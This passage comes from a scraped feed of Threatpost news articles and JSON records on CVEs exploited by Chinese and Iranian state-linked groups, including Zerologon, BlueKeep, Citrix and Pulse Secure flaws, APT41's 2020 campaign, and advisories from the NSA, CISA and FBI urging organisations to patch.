vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. 
The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. 
An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. 
It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. 
\u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "cvss3": {}, "published": "2020-10-21T20:31:17", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-01T21:47:35", "description": "An APT group known as Pioneer Kitten, linked to Iran, has been spotted selling corporate-network credentials on hacker forums. The credentials would let other cybercriminal groups and APTs perform cyberespionage and other nefarious cyber-activity.\n\nPioneer Kitten is a hacker group that specializes in infiltrating corporate networks using open-source tools to compromise remote external services. 
Researchers observed an actor associated with the group advertising access to compromised networks on an underground forum in July, according to a [blog post](<https://www.crowdstrike.com/blog/who-is-pioneer-kitten/>) Monday from Alex Orleans, a senior intelligence analyst at CrowdStrike Intelligence.\n\nPioneer Kitten\u2019s work is related to other groups either sponsored or run by the Iranian government, which [were previously seen](<https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/>) hacking VPNs and planting backdoors in companies around the world.\n\nIndeed, the credential sales on hacker forums seem to suggest \u201ca potential attempt at revenue stream diversification\u201d to complement \u201cits targeted intrusions in support of the Iranian government,\u201d Orleans wrote. However, Pioneer Kitten, which has been around since 2017, does not appear to be directly operated by the Iranian government but is rather sympathetic to the regime and likely a private contractor, Orleans noted.\n\nPioneer Kitten\u2019s chief mode of operations is its reliance on SSH tunneling, using open-source tools such as Ngrok and a custom tool called SSHMinion, he wrote. The group uses these tools to communicate \u201cwith implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP)\u201d to exploit vulnerabilities in VPNs and network appliances to do its dirty work, Orleans explained.\n\nCrowdStrike observed the group leveraging several critical exploits in particular \u2014 [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and most recently, [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>). 
All three exploits affect VPNs and networking equipment, including Pulse Secure \u201cConnect\u201d enterprise VPNs, Citrix servers and network gateways, and F5 Networks BIG-IP load balancers, respectively.\n\nPioneer Kitten\u2019s targets are North American and Israeli organizations in various sectors that represent some type of intelligence interest to the Iranian government, according to CrowdStrike. Target sectors run the gamut and include technology, government, defense, healthcare, aviation, media, academic, engineering, consulting and professional services, chemical, manufacturing, financial services, insurance and retail.\n\nWhile not as well-known or widespread in its activity as other nation-state threats such as China and Russia, Iran has emerged in recent years as a formidable cyber-enemy, amassing a number of APTs to mount attacks on its political adversaries.\n\nOf these, Charming Kitten\u2014which also goes by the names APT35, Ajax or Phosphorus\u2014appears to be the most active and dangerous, while others bearing similar names seem to be spin-offs or support groups. Iran overall appears to be ramping up its cyber-activity lately. CrowdStrike\u2019s report actually comes on the heels of news that Charming Kitten also has [resurfaced recently](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>). A new campaign is using LinkedIn and WhatsApp to convince targets \u2014 including Israeli university scholars and U.S. government employees \u2014 to click on a malicious link that can steal credentials.\n\nOperating since 2014, Charming Kitten is known for politically motivated and socially engineered attacks, and often uses phishing as its attack of choice. 
Targets of the APT, which uses clever social engineering to snare victims, have been [email accounts](<https://threatpost.com/iran-linked-hackers-target-trump-2020-campaign-microsoft-says/148931/>) tied to the Trump 2020 re-election campaign and [public figures and human-rights activists](<https://threatpost.com/charming-kitten-uses-fake-interview-requests-to-target-public-figures/152628/>), among others.\n", "cvss3": {}, "published": "2020-09-01T13:35:19", "type": "threatpost", "title": "Pioneer Kitten APT Sells Corporate Network Access", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-01T13:35:19", "id": "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "href": "https://threatpost.com/pioneer-kitten-apt-sells-corporate-network-access/158833/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-13T16:45:38", "description": "U.S. 
government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft\u2019s severe privilege-escalation flaw, dubbed \u201cZerologon,\u201d to target elections support systems.\n\nDays after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)), the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.\n\nThe advisory details how attackers are chaining together various vulnerabilities and exploits \u2013 including using VPN vulnerabilities to gain initial access and then Zerologon as a post-exploitation method \u2013 to compromise government networks.\n\n\u201cThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal and territorial (SLTT) government networks,\u201d according [to the security advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>). \u201cAlthough it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\u201d\n\nWith the [U.S. 
November presidential elections](<https://threatpost.com/2020-election-secure-vote-tallies-problem/158533/>) around the corner \u2013 and cybercriminal activity subsequently ramping up to target [election infrastructure](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>) and [presidential campaigns](<https://threatpost.com/microsoft-cyberattacks-trump-biden-election-campaigns/159143/>) \u2013 election security is top of mind. While the CISA and FBI\u2019s advisory did not detail what type of elections systems were targeted, it did note that there is no evidence to support that the \u201cintegrity of elections data has been compromised.\u201d\n\nMicrosoft released a patch for the Zerologon vulnerability as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\nDespite a patch being issued, many companies have not yet applied the patches to their systems \u2013 and cybercriminals are taking advantage of that in a recent slew of government-targeted attacks.\n\nThe CISA and FBI warned that various APT actors are commonly using [a Fortinet vulnerability](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) to gain initial access to companies. That flaw (CVE-2018-13379) is a path-traversal glitch in Fortinet\u2019s FortiOS Secure Socket Layer (SSL) virtual private network (VPN) solution. 
While the flaw was patched in April 2019, exploitation details were publicized in August 2019, opening the door for attackers to exploit the error.\n\nOther initial vulnerabilities being targeted in the attacks include ones in Citrix NetScaler ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), MobileIron ([CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)), Pulse Secure ([CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)), Palo Alto Networks ([CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)) and F5 BIG-IP ([CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)).\n\nAfter exploiting an initial flaw, attackers are then leveraging the Zerologon flaw to escalate privileges, researchers said. They then use legitimate credentials to log in via VPN or remote-access services, in order to maintain persistence.\n\n\u201cThe actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers,\u201d they said. \u201cActors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers.\u201d\n\nThe advisory comes as exploitation attempts against Zerologon spike, with Microsoft having recently warned of exploits by an [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which the company calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm). 
[Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[Earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n\nCISA and the FBI stressed that organizations should ensure their systems are patched, and adopt an \u201cassume breach\u201d mentality. Satnam Narang, staff research engineer with Tenable, agreed, saying that \u201cit seems clear that Zerologon is becoming one of the most critical vulnerabilities of 2020.\u201d\n\n\u201cPatches are available for all of the vulnerabilities referenced in the joint cybersecurity advisory from CISA and the FBI,\u201d said Narang [in a Monday analysis](<https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain>). \u201cMost of the vulnerabilities had patches available for them following their disclosure, with the exception of CVE-2019-19781, which received patches a month after it was originally disclosed.\u201d\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. 
[Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:39:01", "type": "threatpost", "title": "Election Systems Under Attack via Microsoft Zerologon Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-13T16:39:01", "id": "THREATPOST:71C45E867DCD99278A38088B59938B48", "href": "https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:19:31", "description": "The U.S. 
government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.

Patches are currently available for all these flaws – and in some cases, have been available for over a year – however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a Monday advisory. CISA claims the attacks were launched by threat actors affiliated with the Chinese Ministry of State Security.

“CISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats,” according to a [Monday CISA advisory](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>). “Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors’ operations and protect organizations’ resources and information systems.”

No further details on the specific hacked entities were made public. The threat actors have been spotted successfully exploiting two common vulnerabilities – allowing them to compromise federal government and commercial entities, according to CISA.

The first is a vulnerability (CVE-2020-5902) in [F5’s Big-IP Traffic Management User Interface](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>), which allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code. As of July, about 8,000 users of F5 Networks’ BIG-IP family of networking devices [were still vulnerable](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to the critical flaw.

Feds also observed the attackers exploiting an [arbitrary file reading vulnerability](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) affecting Pulse Secure VPN appliances (CVE-2019-11510). This flaw – speculated to be the [cause of the Travelex breach](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) earlier this year – allows bad actors to gain access to victim networks.

“Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where [compromised Active Directory credentials](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) were used months after the victim organization patched their VPN appliance,” according to the advisory.

Threat actors were also observed hunting for [Citrix VPN Appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) vulnerable to CVE-2019-19781, which is a flaw that enables attackers to execute directory traversal attacks. And, they have also been observed attempting to exploit a [Microsoft Exchange server](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>) remote code execution flaw (CVE-2020-0688) that allows attackers to collect emails of targeted networks.

As part of its advisory, CISA also identified common TTPs utilized by the threat actors. For instance, threat actors have been spotted using [the Cobalt Strike commercial penetration testing tool](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to target commercial and federal government networks; CISA has also seen the actors successfully deploying the [open-source China Chopper tool](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) against organization networks and using the [open-source tool Mimikatz](<https://threatpost.com/wipro-attackers-under-radar/144276/>).

The initial access vector for these cyberattacks varies. CISA said it has observed threat actors utilize malicious links in spearphishing emails, as well as exploit public-facing applications. In one case, CISA observed the threat actors scanning a federal government agency for vulnerable web servers, as well as scanning for known vulnerabilities in network appliances (CVE-2019-11510). CISA also observed threat actors scanning and performing reconnaissance of federal government internet-facing systems shortly after the disclosure of “significant CVEs.”

CISA said maintaining a rigorous patching cycle continues to be the best defense against these attacks.

“If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network,” according to the advisory.

Terence Jackson, CISO at Thycotic, echoed this recommendation, saying the advisory sheds light on the fact that organizations need to keep up with patch management. In fact, he said, according to a recent [Check Point report](<https://www.checkpoint.com/downloads/resources/cyber-attack-trends-report-mid-year-2020.pdf?mkt_tok=eyJpIjoiTldNM05UWTJOelEwTnpZeCIsInQiOiJTSVY0QTBcL0d1UnpKcXM1UzZRRnRRV1RBV1djcnArM3BWK0VrUlQyb2JFVkJka05EWFhGOFpSSVJOZGszcnlpVFNVNVBwSjZDRXNxZGdkTGRKQzJJem4yYWlBQXJERUdkNDNrZEJDWGxNVUZ3WWt5K25vc2trRnNPNFZaY3JzOE8ifQ%3D%3D>), 80 percent of observed ransomware attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier – and more than 20 percent of the attacks used vulnerabilities that are at least seven years old.

“Patch management is one of the fundamentals of security, however, it is difficult and we are still receiving a failing grade. Patch management, enforcing MFA and least privilege are key to preventing cyber-attacks in both the public and private sectors,” he told Threatpost.

_Source: [Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>), Threatpost, September 14, 2020._

Criminal small talk in underground forums offers critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.

An analysis of such chatter, by Cognyte, examined 15 [cybercrime forums](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) between Jan. 2020 and March 2021. In its report, researchers highlight which CVEs are the most frequently mentioned and try to determine where attackers might strike next.

“Our findings revealed that there is no 100 percent correlation between the two parameters, since the top five CVEs that received the highest number of posts are not exactly the ones that were mentioned on the highest number of Dark Web forums examined,” the report said.
“However, it is still enough to understand which CVEs were popular among threat actors on the Dark Web during the time examined.”

The researchers found [ZeroLogon](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>), [SMBGhost](<https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/>) and [BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) were among the most buzzed-about vulnerabilities among attackers between Jan. 2020 and March 2021.

## **Six CVEs Popular with Criminals**

1. [CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) (aka ZeroLogon)
2. [CVE-2020-0796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0796>) (aka SMBGhost)
3. [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)
4. [CVE-2019-0708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>) (aka BlueKeep)
5. [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>)
6. [CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)

“Most of the CVEs in this list were abused by nation-state groups and cybercriminals, such as ransomware gangs, during worldwide campaigns against different sectors,” the report said.

Notably, all the CVEs threat actors are still focused on are old, meaning that basic patching and mitigation could have stopped many attacks before they even got started.

The report added that the 9-year-old [CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) was exploited by threat actors during the COVID-19 pandemic in 2020, which “indicates that organizations are not patching their systems and are not maintaining a resilient security posture.”

Microsoft has the dubious distinction of being behind five of the six most popular vulns on the Dark Web, Cognyte found. Microsoft has also had a tough time getting users to patch them.

ZeroLogon is a prime example. The [flaw in Microsoft’s software](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) allows threat actors to access domain controllers and breach all Active Directory identity services. Patching of ZeroLogon was so slow that Microsoft announced in January it would start blocking Active Directory domain access to unpatched systems with an “enforcement mode.”

In March 2020, Microsoft patched the number two vulnerability on the list, CVE-2020-0796, but as of October, 100,000 [Windows systems were still vulnerable](<https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/>).

The analysts explained that which CVEs were most talked about varied with the forum language. The CVE favored by Russian-language forums was CVE-2019-19781. Chinese forums were buzzing most about CVE-2020-0796. There was a tie between CVE-2020-0688 and CVE-2019-19781 in English-speaking threat actor circles. And Turkish forums were focused on CVE-2019-6340.

The researchers add, for context, that about half of the monitored forums were Russian-speaking and that Spanish forums aren’t mentioned because there wasn’t a clear frontrunning CVE discussed.

_Source: [Top CVEs Trending with Cybercriminals](<https://threatpost.com/top-cves-trending-with-cybercriminals/167889/>), Threatpost, July 16, 2021._

Researchers warn that APT41, a notorious China-linked threat group, has targeted more than 75 organizations worldwide in “one of the broadest campaigns by a Chinese cyber-espionage actor observed in recent years.”

Between Jan. 20 and March 11, researchers observed APT41 exploiting vulnerabilities in Citrix NetScaler/ADC, Cisco routers and Zoho ManageEngine Desktop Central as part of the widespread espionage campaign.
Researchers said it’s unclear if APT41 attempted exploitation en masse, or if they homed in on specific organizations — but the victims do appear to have been selected in a targeted manner.

“While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41,” wrote Christopher Glyer, Dan Perez, Sarah Jones and Steve Miller with FireEye, in a [Wednesday analysis](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>).

Dozens of companies were targeted from varying industries, including banking and finance, defense industrial bases, government, healthcare, legal, manufacturing, media, non-profit, oil and gas, transportation and utilities. APT41 also targeted firms from a broad array of countries, including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, the U.K. and the U.S.

**Cisco, Citrix and Zoho Exploits**

Starting on Jan. 20, researchers observed the threat group attempting to exploit the notorious flaw ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)) in Citrix Application Delivery Controller (ADC) and Citrix Gateway devices, revealed as a zero-day and then patched earlier this year. It was [disclosed on Dec. 17](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) – and [proof of concept (PoC) code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) was released shortly after – before a patch [was issued in January](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).

In this campaign, researchers observed three waves of exploits against [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>) – the first on Jan. 20 – 21, the second on Feb. 1, and finally a “significant uptick” in exploitation on Feb. 24 – 25.

Post-exploit, APT41 executed a command (‘file /bin/pwd’) on affected systems that researchers say may have achieved two objectives: “First, it would confirm whether the system was vulnerable and the mitigation wasn’t applied,” researchers noted. “Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.”

On Feb. 21, researchers next observed APT41 switching gears to exploit a Cisco RV320 router (Cisco’s WAN VPN routers for small businesses) at a telecommunications organization. After exploitation, the threat actors downloaded an executable and linkable format (ELF) binary payload. Researchers aren’t sure what specific exploit was used in this case, but pointed to a Metasploit module combining two CVEs ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers.

[APT41 activity timeline (image)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/25112442/APT41-timeline.png>)

Finally, on March 8, the threat actor was observed [exploiting a critical vulnerability](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. The flaw ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>)) was first disclosed on March 5 as a zero-day, and [was later patched](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) on March 7. The attackers exploited the flaw to deploy payloads (install.bat and storesyncsvc.dll) in two ways. First, after exploiting the flaw they directly uploaded a simple Java-based program (“logger.zip”) containing a set of commands, which then used PowerShell to download and execute the payloads. In a second attack, APT41 leveraged a legitimate Microsoft command-line tool, BITSAdmin, to download the payload.

Notably, after exploitation, the attackers have been seen leveraging only publicly available malware, including Cobalt Strike (a [commercially available exploitation framework](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>)) and Meterpreter (a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code). Said researchers: “While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.”

**APT41 Activity**

Interestingly, between waves of exploitation, researchers observed a lull in APT41 activity. The first lull, between Jan. 23 and Feb. 1, was likely related to the Chinese Lunar New Year holidays (which occurred Jan. 24 – 30): “This has been a common activity pattern by Chinese APT groups in past years as well,” said researchers.

The second lull, occurring Feb. 2 – 19, may have been related to fallout from the rapid spread of the coronavirus pandemic. Researchers noted that China had initiated [COVID-19 related quarantines](<https://threatpost.com/coronavirus-themed-cyberattacks-persists/153493/>) in cities in the Hubei province Jan. 23 – 24, and rolled out quarantines to additional provinces starting between Feb. 2 and Feb. 10.

“While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry,” said researchers.

They also said that [APT41](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>) has [historically](<https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html>) (since 2012) conducted dual Chinese state-sponsored espionage activity and personal, financially motivated activity. More recently, in October 2019, the [threat group was discovered](<https://threatpost.com/china-hackers-spy-texts-messagetap-malware/149761/>) using a new malware strain to intercept telecom SMS server traffic and sniff out certain phone numbers and SMS messages – particularly those with keywords relating to Chinese political dissidents.

“In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks,” said researchers on Wednesday. “This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.”

_Source: [Chinese Hackers Exploit Cisco, Citrix Flaws in Massive Espionage Campaign](<https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/>), Threatpost, March 25, 2020._

A researcher has created a proof-of-concept Metasploit module for the critical BlueKeep vulnerability, which successfully demonstrates how to achieve complete takeover of a target Windows machine.

Reverse engineer Zǝɹosum0x0 [tweeted about his success](<https://twitter.com/zerosum0x0/status/1135866953996820480>) on Tuesday, noting that he plans to keep the module private given the danger that a working exploit could pose to the vast swathe of unpatched systems out there. He also released a video showing a remote code-execution (RCE) exploit working on a Windows 2008 desktop, paired with the Mimikatz tool to harvest login credentials. In about 22 seconds, he achieved full takeover.

“Still too dangerous to release, lame sorry,” he tweeted. “Maybe after first mega-worm?”

An [earlier proof-of-concept (PoC) from McAfee](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) showed a successful RCE exploit, but didn’t include the credential-harvesting – so a mitigating factor in that exploit would be the need for an attacker to bypass network-level authentication protections.
